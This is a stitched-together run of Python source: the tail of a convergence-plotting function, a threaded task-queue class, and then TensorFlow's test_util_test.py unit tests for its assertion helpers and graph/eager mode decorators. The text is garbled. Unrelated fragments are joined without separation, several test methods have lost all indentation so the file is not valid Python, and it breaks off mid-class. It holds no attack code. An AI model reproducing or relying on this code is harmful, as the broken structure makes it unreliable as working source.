                ax.plot(iterations, m, c=color, alpha=0.2)
            ax.plot(iterations, np.mean(mins, axis=0), c=color,
                    marker=".", markersize=12, lw=2, label=name)

    if true_minimum:
        ax.axhline(true_minimum, linestyle="--",
                   color="r", lw=1,
                   label="True minimum")

    if true_minimum or name:
        ax.legend(loc="best")
    ax.grid()
    return ax
class MultiThreadTaskQueue(queue.Queue):
    """A queue.Queue that executes submitted tasks on a pool of daemon
    worker threads and collects their return values.

    Results are appended in completion order, not submission order.
    """

    def __init__(self, num_threads=1):
        queue.Queue.__init__(self)
        self.num_threads = num_threads
        # Initialize results *before* starting the workers: a worker could
        # otherwise pick up a task and fail on a missing self.results
        # attribute (race in the original attribute ordering).
        self.results = []
        self.start_threads()

    def put_task(self, task, *args, **kwargs):
        """Enqueue task(*args, **kwargs) for asynchronous execution."""
        self.put((task, args, kwargs))

    def start_threads(self):
        """Spawn num_threads daemon worker threads."""
        for _ in range(self.num_threads):
            # daemon=True replaces the deprecated setDaemon() call
            t = threading.Thread(target=self.task_in_thread, daemon=True)
            t.start()

    def task_in_thread(self):
        """Worker loop: run tasks forever, recording each return value."""
        while True:
            task, args, kwargs = self.get()
            try:
                # list.append is atomic in CPython, so no lock is needed
                self.results.append(task(*args, **kwargs))
            finally:
                # Mark the task done even when it raised, so join() on the
                # queue cannot hang on a failed task.
                self.task_done()

    def get_results(self):
        """Return the list of results collected so far."""
        return self.results
|
test_util_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import random
import threading
import weakref
from absl.testing import parameterized
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops # pylint: disable=unused-import
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase, parameterized.TestCase):
  @test_util.run_deprecated_v1
  def test_assert_ops_in_graph(self):
    """assert_ops_in_graph accepts a present (name, type) pair and raises
    ValueError for a missing name or a mismatched op type."""
    with self.test_session():
      constant_op.constant(["hello", "taffy"], name="hello")
      test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
    self.assertRaises(ValueError, test_util.assert_ops_in_graph,
                      {"bye": "Const"}, ops.get_default_graph())
    self.assertRaises(ValueError, test_util.assert_ops_in_graph,
                      {"hello": "Variable"}, ops.get_default_graph())
  @test_util.run_deprecated_v1
  def test_session_functions(self):
    """cached_session reuses one session (and rejects conflicting configs),
    while session() creates a fresh session closed on scope exit."""
    with self.test_session() as sess:
      sess_ref = weakref.ref(sess)
      with self.cached_session(graph=None, config=None) as sess2:
        # We make sure that sess2 is sess.
        assert sess2 is sess
        # We make sure we raise an exception if we use cached_session with
        # different values.
        with self.assertRaises(ValueError):
          with self.cached_session(graph=ops.Graph()) as sess2:
            pass
        with self.assertRaises(ValueError):
          with self.cached_session(force_gpu=True) as sess2:
            pass
    # We make sure that test_session will cache the session even after the
    # with scope.
    assert not sess_ref()._closed
    with self.session() as unique_sess:
      unique_sess_ref = weakref.ref(unique_sess)
      with self.session() as sess2:
        assert sess2 is not unique_sess
    # We make sure the session is closed when we leave the with statement.
    assert unique_sess_ref()._closed
  def test_assert_equal_graph_def(self):
    """assert_equal_graph_def ignores node order but flags extra nodes."""
    with ops.Graph().as_default() as g:
      def_empty = g.as_graph_def()
      constant_op.constant(5, name="five")
      constant_op.constant(7, name="seven")
      def_57 = g.as_graph_def()
    with ops.Graph().as_default() as g:
      constant_op.constant(7, name="seven")
      constant_op.constant(5, name="five")
      def_75 = g.as_graph_def()
    # Comparing strings is order dependent
    self.assertNotEqual(str(def_57), str(def_75))
    # assert_equal_graph_def doesn't care about order
    test_util.assert_equal_graph_def(def_57, def_75)
    # Compare two unequal graphs
    with self.assertRaisesRegexp(AssertionError,
                                 r"^Found unexpected node '{{node seven}}"):
      test_util.assert_equal_graph_def(def_57, def_empty)
  def testIsGoogleCudaEnabled(self):
    """Smoke test: IsGoogleCudaEnabled() is callable from Python."""
    # The test doesn't assert anything. It ensures the py wrapper
    # function is generated correctly.
    if test_util.IsGoogleCudaEnabled():
      print("GoogleCuda is enabled")
    else:
      print("GoogleCuda is disabled")
  def testIsBuiltWithROCm(self):
    """Smoke test: IsBuiltWithROCm() is callable from Python."""
    # The test doesn't assert anything. It ensures the py wrapper
    # function is generated correctly.
    if test_util.IsBuiltWithROCm():
      print("Tensorflow build has ROCm support")
    else:
      print("Tensorflow build does not have ROCm support")
  def testIsMklEnabled(self):
    """Smoke test: IsMklEnabled() is callable from Python."""
    # This test doesn't assert anything.
    # It ensures the py wrapper function is generated correctly.
    if test_util.IsMklEnabled():
      print("MKL is enabled")
    else:
      print("MKL is disabled")
  @test_util.run_in_graph_and_eager_modes
  def testAssertProtoEqualsStr(self):
    """assertProtoEquals accepts both a text-format string and a proto."""
    graph_str = "node { name: 'w1' op: 'params' }"
    graph_def = graph_pb2.GraphDef()
    text_format.Merge(graph_str, graph_def)
    # test string based comparison
    self.assertProtoEquals(graph_str, graph_def)
    # test original comparison
    self.assertProtoEquals(graph_def, graph_def)
  @test_util.run_in_graph_and_eager_modes
  def testAssertProtoEqualsAny(self):
    """assertProtoEquals unpacks protobuf.Any fields and reports their
    contents in failure messages."""
    # Test assertProtoEquals with a protobuf.Any field.
    meta_graph_def_str = """
    meta_info_def {
      meta_graph_version: "outer"
      any_info {
        [type.googleapis.com/tensorflow.MetaGraphDef] {
          meta_info_def {
            meta_graph_version: "inner"
          }
        }
      }
    }
    """
    meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
    meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
    meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
    meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
    meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
    self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
    self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
    # Check if the assertion failure message contains the content of
    # the inner proto.
    with self.assertRaisesRegexp(AssertionError,
                                 r'meta_graph_version: "inner"'):
      self.assertProtoEquals("", meta_graph_def_outer)
  @test_util.run_in_graph_and_eager_modes
  def testNDArrayNear(self):
    """_NDArrayNear is True for equal arrays, False beyond tolerance."""
    a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
    a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
    a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
    self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
    self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
  @test_util.run_in_graph_and_eager_modes
  def testCheckedThreadSucceeds(self):
    """checkedThread runs its target to completion without error."""

    def noop(ev):
      ev.set()

    event_arg = threading.Event()
    self.assertFalse(event_arg.is_set())
    t = self.checkedThread(target=noop, args=(event_arg,))
    t.start()
    t.join()
    self.assertTrue(event_arg.is_set())
  @test_util.run_in_graph_and_eager_modes
  def testCheckedThreadFails(self):
    """An exception raised in a checkedThread surfaces from join()."""

    def err_func():
      return 1 // 0

    t = self.checkedThread(target=err_func)
    t.start()
    with self.assertRaises(self.failureException) as fe:
      t.join()
    self.assertTrue("integer division or modulo by zero" in str(fe.exception))
  @test_util.run_in_graph_and_eager_modes
  def testCheckedThreadWithWrongAssertionFails(self):
    """A failed test assertion inside a checkedThread surfaces from join()."""
    x = 37

    def err_func():
      self.assertTrue(x < 10)

    t = self.checkedThread(target=err_func)
    t.start()
    with self.assertRaises(self.failureException) as fe:
      t.join()
    self.assertTrue("False is not true" in str(fe.exception))
  @test_util.run_in_graph_and_eager_modes
  def testMultipleThreadsWithOneFailure(self):
    """Only the thread whose assertion failed reports on join(); the
    other checkedThreads join cleanly."""

    def err_func(i):
      self.assertTrue(i != 7)

    threads = [
        self.checkedThread(
            target=err_func, args=(i,)) for i in range(10)
    ]
    for t in threads:
      t.start()
    for i, t in enumerate(threads):
      if i == 7:
        with self.assertRaises(self.failureException):
          t.join()
      else:
        t.join()
  def _WeMustGoDeeper(self, msg):
    """Helper: raise an op error from an op with an original_op chain and
    assert that assertRaisesOpError matches *msg* somewhere in it."""
    with self.assertRaisesOpError(msg):
      with ops.Graph().as_default():
        node_def = ops._NodeDef("IntOutput", "name")
        node_def_orig = ops._NodeDef("IntOutput", "orig")
        op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
        op = ops.Operation(node_def, ops.get_default_graph(),
                           original_op=op_orig)
        raise errors.UnauthenticatedError(node_def, op, "true_err")
  @test_util.run_in_graph_and_eager_modes
  def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
    """assertRaisesOpError matches the message, op names and original-op
    names, but not arbitrary unrelated text."""
    with self.assertRaises(AssertionError):
      self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
    self._WeMustGoDeeper("true_err")
    self._WeMustGoDeeper("name")
    self._WeMustGoDeeper("orig")
  @test_util.run_in_graph_and_eager_modes
  def testAllCloseTensors(self):
    """assertAllClose compares tensors, raw data, dicts and lists of both."""
    a_raw_data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
    a = constant_op.constant(a_raw_data)
    b = math_ops.add(1, constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8]]))
    self.assertAllClose(a, b)
    self.assertAllClose(a, a_raw_data)
    a_dict = {"key": a}
    b_dict = {"key": b}
    self.assertAllClose(a_dict, b_dict)
    x_list = [a, b]
    y_list = [a_raw_data, b]
    self.assertAllClose(x_list, y_list)
  @test_util.run_in_graph_and_eager_modes
  def testAllCloseScalars(self):
    """assertAllClose on scalars passes within and fails beyond tolerance."""
    self.assertAllClose(7, 7 + 1e-8)
    with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
      self.assertAllClose(7, 7 + 1e-5)
  @test_util.run_in_graph_and_eager_modes
  def testAllCloseList(self):
    """A mismatched list fails with the 'not close' diagnostic."""
    with self.assertRaisesRegexp(AssertionError, r"not close dif"):
      self.assertAllClose([0], [1])
  @test_util.run_in_graph_and_eager_modes
  def testAllCloseDictToNonDict(self):
    """Comparing a dict with a non-dict raises ValueError either way."""
    with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
      self.assertAllClose(1, {"a": 1})
    with self.assertRaisesRegexp(ValueError, r"Can't compare dict to non-dict"):
      self.assertAllClose({"a": 1}, 1)
  @test_util.run_in_graph_and_eager_modes
  def testAllCloseNamedtuples(self):
    """assertAllClose compares namedtuples against dicts and each other."""
    a = 7
    b = (2., 3.)
    c = np.ones((3, 2, 4)) * 7.
    expected = {"a": a, "b": b, "c": c}
    my_named_tuple = collections.namedtuple("MyNamedTuple", ["a", "b", "c"])
    # Identity.
    self.assertAllClose(expected, my_named_tuple(a=a, b=b, c=c))
    self.assertAllClose(
        my_named_tuple(a=a, b=b, c=c), my_named_tuple(a=a, b=b, c=c))
  @test_util.run_in_graph_and_eager_modes
  def testAllCloseDicts(self):
    """assertAllClose on dicts flags missing keys, value drift and shape
    mismatches."""
    a = 7
    b = (2., 3.)
    c = np.ones((3, 2, 4)) * 7.
    expected = {"a": a, "b": b, "c": c}
    # Identity.
    self.assertAllClose(expected, expected)
    self.assertAllClose(expected, dict(expected))
    # With each item removed.
    for k in expected:
      actual = dict(expected)
      del actual[k]
      with self.assertRaisesRegexp(AssertionError, r"mismatched keys"):
        self.assertAllClose(expected, actual)
    # With each item changed.
    with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
      self.assertAllClose(expected, {"a": a + 1e-5, "b": b, "c": c})
    with self.assertRaisesRegexp(AssertionError, r"Shape mismatch"):
      self.assertAllClose(expected, {"a": a, "b": b + (4.,), "c": c})
    c_copy = np.array(c)
    c_copy[1, 1, 1] += 1e-5
    with self.assertRaisesRegexp(AssertionError, r"Not equal to tolerance"):
      self.assertAllClose(expected, {"a": a, "b": b, "c": c_copy})
  @test_util.run_in_graph_and_eager_modes
  def testAllCloseListOfNamedtuples(self):
    """A list of namedtuples compares close to a list of plain tuples."""
    my_named_tuple = collections.namedtuple("MyNamedTuple", ["x", "y"])
    l1 = [
        my_named_tuple(x=np.array([[2.3, 2.5]]), y=np.array([[0.97, 0.96]])),
        my_named_tuple(x=np.array([[3.3, 3.5]]), y=np.array([[0.98, 0.99]]))
    ]
    l2 = [
        ([[2.3, 2.5]], [[0.97, 0.96]]),
        ([[3.3, 3.5]], [[0.98, 0.99]]),
    ]
    self.assertAllClose(l1, l2)
  @test_util.run_in_graph_and_eager_modes
  def testAllCloseNestedStructure(self):
    """A nested mismatch is reported with the full key path in the error."""
    a = {"x": np.ones((3, 2, 4)) * 7, "y": (2, [{"nested": {"m": 3, "n": 4}}])}
    self.assertAllClose(a, a)
    b = copy.deepcopy(a)
    self.assertAllClose(a, b)
    # Test mismatched values
    b["y"][1][0]["nested"]["n"] = 4.2
    with self.assertRaisesRegexp(AssertionError,
                                 r"\[y\]\[1\]\[0\]\[nested\]\[n\]"):
      self.assertAllClose(a, b)
  @test_util.run_in_graph_and_eager_modes
  def testArrayNear(self):
    """assertArrayNear rejects length mismatches (AssertionError) and
    nested lists (TypeError), and accepts equal flat lists."""
    a = [1, 2]
    b = [1, 2, 5]
    with self.assertRaises(AssertionError):
      self.assertArrayNear(a, b, 0.001)
    a = [1, 2]
    b = [[1, 2], [3, 4]]
    with self.assertRaises(TypeError):
      self.assertArrayNear(a, b, 0.001)
    a = [1, 2]
    b = [1, 2]
    self.assertArrayNear(a, b, 0.001)
  @test_util.skip_if(True)  # b/117665998
  def testForceGPU(self):
    """force_gpu=True fails for an op with no GPU kernel (Assert)."""
    with self.assertRaises(errors.InvalidArgumentError):
      with self.test_session(force_gpu=True):
        # this relies on us not having a GPU implementation for assert, which
        # seems sensible
        x = constant_op.constant(True)
        y = [15]
        control_flow_ops.Assert(x, y).run()
  @test_util.run_in_graph_and_eager_modes
  def testAssertAllCloseAccordingToType(self):
    """assertAllCloseAccordingToType picks per-dtype tolerances: the same
    numeric gap passes at lower precision and fails at higher precision."""
    # test plain int
    self.assertAllCloseAccordingToType(1, 1, rtol=1e-8, atol=1e-8)

    # test float64
    self.assertAllCloseAccordingToType(
        np.asarray([1e-8], dtype=np.float64),
        np.asarray([2e-8], dtype=np.float64),
        rtol=1e-8, atol=1e-8
    )
    self.assertAllCloseAccordingToType(
        constant_op.constant([1e-8], dtype=dtypes.float64),
        constant_op.constant([2e-8], dtype=dtypes.float64),
        rtol=1e-8,
        atol=1e-8)
    with (self.assertRaises(AssertionError)):
      self.assertAllCloseAccordingToType(
          np.asarray([1e-7], dtype=np.float64),
          np.asarray([2e-7], dtype=np.float64),
          rtol=1e-8, atol=1e-8
      )

    # test float32
    self.assertAllCloseAccordingToType(
        np.asarray([1e-7], dtype=np.float32),
        np.asarray([2e-7], dtype=np.float32),
        rtol=1e-8, atol=1e-8,
        float_rtol=1e-7, float_atol=1e-7
    )
    self.assertAllCloseAccordingToType(
        constant_op.constant([1e-7], dtype=dtypes.float32),
        constant_op.constant([2e-7], dtype=dtypes.float32),
        rtol=1e-8,
        atol=1e-8,
        float_rtol=1e-7,
        float_atol=1e-7)
    with (self.assertRaises(AssertionError)):
      self.assertAllCloseAccordingToType(
          np.asarray([1e-6], dtype=np.float32),
          np.asarray([2e-6], dtype=np.float32),
          rtol=1e-8, atol=1e-8,
          float_rtol=1e-7, float_atol=1e-7
      )

    # test float16
    self.assertAllCloseAccordingToType(
        np.asarray([1e-4], dtype=np.float16),
        np.asarray([2e-4], dtype=np.float16),
        rtol=1e-8, atol=1e-8,
        float_rtol=1e-7, float_atol=1e-7,
        half_rtol=1e-4, half_atol=1e-4
    )
    self.assertAllCloseAccordingToType(
        constant_op.constant([1e-4], dtype=dtypes.float16),
        constant_op.constant([2e-4], dtype=dtypes.float16),
        rtol=1e-8,
        atol=1e-8,
        float_rtol=1e-7,
        float_atol=1e-7,
        half_rtol=1e-4,
        half_atol=1e-4)
    with (self.assertRaises(AssertionError)):
      self.assertAllCloseAccordingToType(
          np.asarray([1e-3], dtype=np.float16),
          np.asarray([2e-3], dtype=np.float16),
          rtol=1e-8, atol=1e-8,
          float_rtol=1e-7, float_atol=1e-7,
          half_rtol=1e-4, half_atol=1e-4
      )
  @test_util.run_in_graph_and_eager_modes
  def testAssertAllEqual(self):
    """assertAllEqual evaluates variables/tensors and compares exactly."""
    i = variables.Variable([100] * 3, dtype=dtypes.int32, name="i")
    j = constant_op.constant([20] * 3, dtype=dtypes.int32, name="j")
    k = math_ops.add(i, j, name="k")
    self.evaluate(variables.global_variables_initializer())
    self.assertAllEqual([100] * 3, i)
    self.assertAllEqual([120] * 3, k)
    self.assertAllEqual([20] * 3, j)
    # A mismatch must identify which side ("lhs") disagrees.
    with self.assertRaisesRegexp(AssertionError, r"not equal lhs"):
      self.assertAllEqual([0] * 3, k)
  @test_util.run_in_graph_and_eager_modes
  def testAssertNotAllClose(self):
    """assertNotAllClose passes on differing values, fails on equal ones."""
    # Test with arrays
    self.assertNotAllClose([0.1], [0.2])
    with self.assertRaises(AssertionError):
      self.assertNotAllClose([-1.0, 2.0], [-1.0, 2.0])
    # Test with tensors
    x = constant_op.constant([1.0, 1.0], name="x")
    y = math_ops.add(x, x)
    self.assertAllClose([2.0, 2.0], y)
    self.assertNotAllClose([0.9, 1.0], x)
    with self.assertRaises(AssertionError):
      self.assertNotAllClose([1.0, 1.0], x)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseRTol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], rtol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, rtol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseATol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], atol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, atol=0.2)
  @test_util.run_in_graph_and_eager_modes
  def testAssertAllGreaterLess(self):
    """Strict elementwise bounds: every element must satisfy the comparison."""
    x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
    y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
    z = math_ops.add(x, y)
    self.assertAllClose([110.0, 120.0, 130.0], z)
    self.assertAllGreater(x, 95.0)
    self.assertAllLess(x, 125.0)
    # One out-of-bound element is enough to fail.
    with self.assertRaises(AssertionError):
      self.assertAllGreater(x, 105.0)
    with self.assertRaises(AssertionError):
      self.assertAllGreater(x, 125.0)
    with self.assertRaises(AssertionError):
      self.assertAllLess(x, 115.0)
    with self.assertRaises(AssertionError):
      self.assertAllLess(x, 95.0)
  @test_util.run_in_graph_and_eager_modes
  def testAssertAllGreaterLessEqual(self):
    """Non-strict elementwise bounds (>= / <=) over every element."""
    x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
    y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
    z = math_ops.add(x, y)
    self.assertAllEqual([110.0, 120.0, 130.0], z)
    self.assertAllGreaterEqual(x, 95.0)
    self.assertAllLessEqual(x, 125.0)
    # One out-of-bound element is enough to fail.
    with self.assertRaises(AssertionError):
      self.assertAllGreaterEqual(x, 105.0)
    with self.assertRaises(AssertionError):
      self.assertAllGreaterEqual(x, 125.0)
    with self.assertRaises(AssertionError):
      self.assertAllLessEqual(x, 115.0)
    with self.assertRaises(AssertionError):
      self.assertAllLessEqual(x, 95.0)
  @test_util.run_deprecated_v1
  def testAssertAllInRangeWithNonNumericValuesFails(self):
    """String, complex and bool tensors are rejected by assertAllInRange."""
    s1 = constant_op.constant("Hello, ", name="s1")
    c = constant_op.constant([1 + 2j, -3 + 5j], name="c")
    b = constant_op.constant([False, True], name="b")
    with self.assertRaises(AssertionError):
      self.assertAllInRange(s1, 0.0, 1.0)
    with self.assertRaises(AssertionError):
      self.assertAllInRange(c, 0.0, 1.0)
    with self.assertRaises(AssertionError):
      self.assertAllInRange(b, 0, 1)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRange(self):
x = constant_op.constant([10.0, 15.0], name="x")
self.assertAllInRange(x, 10, 15)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_lower_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_upper_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(
x, 10, 15, open_lower_bound=True, open_upper_bound=True)
  @test_util.run_in_graph_and_eager_modes
  def testAssertAllInRangeErrorMessageEllipses(self):
    """A large out-of-range tensor still yields a failure (message truncated)."""
    x_init = np.array([[10.0, 15.0]] * 12)
    x = constant_op.constant(x_init, name="x")
    with self.assertRaises(AssertionError):
      self.assertAllInRange(x, 5, 10)
  @test_util.run_in_graph_and_eager_modes
  def testAssertAllInRangeDetectsNaNs(self):
    """NaN values are never considered inside any range."""
    x = constant_op.constant(
        [[np.nan, 0.0], [np.nan, np.inf], [np.inf, np.nan]], name="x")
    with self.assertRaises(AssertionError):
      self.assertAllInRange(x, 0.0, 2.0)
  @test_util.run_in_graph_and_eager_modes
  def testAssertAllInRangeWithInfinities(self):
    """inf is accepted at a closed upper bound but rejected at an open one."""
    x = constant_op.constant([10.0, np.inf], name="x")
    self.assertAllInRange(x, 10, np.inf)
    with self.assertRaises(AssertionError):
      self.assertAllInRange(x, 10, np.inf, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInSet(self):
b = constant_op.constant([True, False], name="b")
x = constant_op.constant([13, 37], name="x")
self.assertAllInSet(b, [False, True])
self.assertAllInSet(b, (False, True))
self.assertAllInSet(b, {False, True})
self.assertAllInSet(x, [0, 13, 37, 42])
self.assertAllInSet(x, (0, 13, 37, 42))
self.assertAllInSet(x, {0, 13, 37, 42})
with self.assertRaises(AssertionError):
self.assertAllInSet(b, [False])
with self.assertRaises(AssertionError):
self.assertAllInSet(x, (42,))
  @test_util.run_deprecated_v1
  def testRandomSeed(self):
    """setUp() must reseed the Python, NumPy and TF RNGs deterministically."""
    # Call setUp again for WithCApi case (since it makes a new default graph
    # after setup).
    # TODO(skyewm): remove this when C API is permanently enabled.
    self.setUp()
    a = random.randint(1, 1000)
    a_np_rand = np.random.rand(1)
    with self.test_session():
      a_rand = random_ops.random_normal([1]).eval()
    # ensure that randomness in multiple testCases is deterministic.
    self.setUp()
    b = random.randint(1, 1000)
    b_np_rand = np.random.rand(1)
    with self.test_session():
      b_rand = random_ops.random_normal([1]).eval()
    self.assertEqual(a, b)
    self.assertEqual(a_np_rand, b_np_rand)
    self.assertEqual(a_rand, b_rand)
  @test_util.run_in_graph_and_eager_modes
  def test_callable_evaluate(self):
    """evaluate() accepts a callable and returns its evaluated result."""

    def model():
      return resource_variable_ops.ResourceVariable(
          name="same_name",
          initial_value=1) + 1

    with context.eager_mode():
      self.assertEqual(2, self.evaluate(model))
  @test_util.run_in_graph_and_eager_modes
  def test_nested_tensors_evaluate(self):
    """evaluate() recurses into nested dicts of tensors."""
    expected = {"a": 1, "b": 2, "nested": {"d": 3, "e": 4}}
    nested = {"a": constant_op.constant(1),
              "b": constant_op.constant(2),
              "nested": {"d": constant_op.constant(3),
                         "e": constant_op.constant(4)}}
    self.assertEqual(expected, self.evaluate(nested))
  def test_run_in_graph_and_eager_modes(self):
    """The decorator runs the body once per mode, with or without parens."""
    l = []

    def inc(self, with_brackets):
      del self  # self argument is required by run_in_graph_and_eager_modes.
      mode = "eager" if context.executing_eagerly() else "graph"
      with_brackets = "with_brackets" if with_brackets else "without_brackets"
      l.append((with_brackets, mode))

    # Used directly as a decorator ...
    f = test_util.run_in_graph_and_eager_modes(inc)
    f(self, with_brackets=False)
    # ... and as a decorator factory: both forms must behave the same.
    f = test_util.run_in_graph_and_eager_modes()(inc)
    f(self, with_brackets=True)
    self.assertEqual(len(l), 4)
    self.assertEqual(set(l), {
        ("with_brackets", "graph"),
        ("with_brackets", "eager"),
        ("without_brackets", "graph"),
        ("without_brackets", "eager"),
    })
def test_get_node_def_from_graph(self):
graph_def = graph_pb2.GraphDef()
node_foo = graph_def.node.add()
node_foo.name = "foo"
self.assertIs(test_util.get_node_def_from_graph("foo", graph_def), node_foo)
self.assertIsNone(test_util.get_node_def_from_graph("bar", graph_def))
  def test_run_in_eager_and_graph_modes_test_class(self):
    """Applying the decorator to a class (not a method) must raise."""
    msg = "`run_in_graph_and_eager_modes` only supports test methods.*"
    with self.assertRaisesRegexp(ValueError, msg):

      @test_util.run_in_graph_and_eager_modes()
      class Foo(object):
        pass
      del Foo  # Make pylint unused happy.
  def test_run_in_eager_and_graph_modes_skip_graph_runs_eager(self):
    """skipTest in the graph run must not prevent the eager run."""
    modes = []

    def _test(self):
      if not context.executing_eagerly():
        self.skipTest("Skipping in graph mode")
      modes.append("eager" if context.executing_eagerly() else "graph")

    test_util.run_in_graph_and_eager_modes(_test)(self)
    self.assertEqual(modes, ["eager"])
  def test_run_in_eager_and_graph_modes_skip_eager_runs_graph(self):
    """skipTest in the eager run must not prevent the graph run."""
    modes = []

    def _test(self):
      if context.executing_eagerly():
        self.skipTest("Skipping in eager mode")
      modes.append("eager" if context.executing_eagerly() else "graph")

    test_util.run_in_graph_and_eager_modes(_test)(self)
    self.assertEqual(modes, ["graph"])
  @test_util.run_deprecated_v1
  def test_run_in_graph_and_eager_modes_setup_in_same_mode(self):
    """setUp() must be re-run in the same mode as each test execution."""
    modes = []
    mode_name = lambda: "eager" if context.executing_eagerly() else "graph"

    class ExampleTest(test_util.TensorFlowTestCase):

      def runTest(self):
        pass

      def setUp(self):
        modes.append("setup_" + mode_name())

      @test_util.run_in_graph_and_eager_modes
      def testBody(self):
        modes.append("run_" + mode_name())

    e = ExampleTest()
    e.setUp()
    e.testBody()
    # Graph setup/run happen first, then the eager pair.
    self.assertEqual(modes[0:2], ["setup_graph", "run_graph"])
    self.assertEqual(modes[2:], ["setup_eager", "run_eager"])
  @parameterized.named_parameters(dict(testcase_name="argument",
                                       arg=True))
  @test_util.run_in_graph_and_eager_modes
  def test_run_in_graph_and_eager_works_with_parameterized_keyword(self, arg):
    """The mode decorator composes with parameterized keyword arguments."""
    self.assertEqual(arg, True)
  def test_build_as_function_and_v1_graph(self):
    """build_as_function_and_v1_graph generates both test variants."""

    class GraphModeAndFuncionTest(parameterized.TestCase):

      def __init__(inner_self):  # pylint: disable=no-self-argument
        super(GraphModeAndFuncionTest, inner_self).__init__()
        inner_self.graph_mode_tested = False
        inner_self.inside_function_tested = False

      def runTest(self):
        del self

      @test_util.build_as_function_and_v1_graph
      def test_modes(inner_self):  # pylint: disable=no-self-argument
        # Distinguish the two generated variants via the active graph.
        is_building_function = ops.get_default_graph().building_function
        if is_building_function:
          self.assertFalse(inner_self.inside_function_tested)
          inner_self.inside_function_tested = True
        else:
          self.assertFalse(inner_self.graph_mode_tested)
          inner_self.graph_mode_tested = True

    test_object = GraphModeAndFuncionTest()
    # The decorator synthesizes one method per variant.
    test_object.test_modes_v1_graph()
    test_object.test_modes_function()
    self.assertTrue(test_object.graph_mode_tested)
    self.assertTrue(test_object.inside_function_tested)
  def test_with_forward_compatibility_horizons(self):
    """with_forward_compatibility_horizons runs the body once per horizon."""
    tested_codepaths = set()

    def some_function_with_forward_compat_behavior():
      if compat.forward_compatible(2050, 1, 1):
        tested_codepaths.add("future")
      else:
        tested_codepaths.add("present")

    # None keeps the current horizon; [2051, 1, 1] moves past 2050-01-01.
    @test_util.with_forward_compatibility_horizons(None, [2051, 1, 1])
    def some_test(self):
      del self  # unused
      some_function_with_forward_compat_behavior()

    some_test(None)
    self.assertEqual(tested_codepaths, set(["present", "future"]))
# Its own test case to reproduce variable sharing issues which only pop up when
# setUp() is overridden and super() is not called.
class GraphAndEagerNoVariableSharing(test_util.TensorFlowTestCase):
  """Regression test: a setUp() override that skips super() must not cause
  variable sharing between the graph and eager runs of a test."""

  def setUp(self):
    pass  # Intentionally does not call TensorFlowTestCase's super()

  @test_util.run_in_graph_and_eager_modes
  def test_no_variable_sharing(self):
    """Creating the same named variable in both modes must not collide."""
    variable_scope.get_variable(
        name="step_size",
        initializer=np.array(1e-5, np.float32),
        use_resource=True,
        trainable=False)
class GarbageCollectionTest(test_util.TensorFlowTestCase):
  """Tests for the garbage- and leak-detection test decorators."""

  def test_no_reference_cycle_decorator(self):
    """@assert_no_garbage_created flags reference cycles made by a test."""

    class ReferenceCycleTest(object):

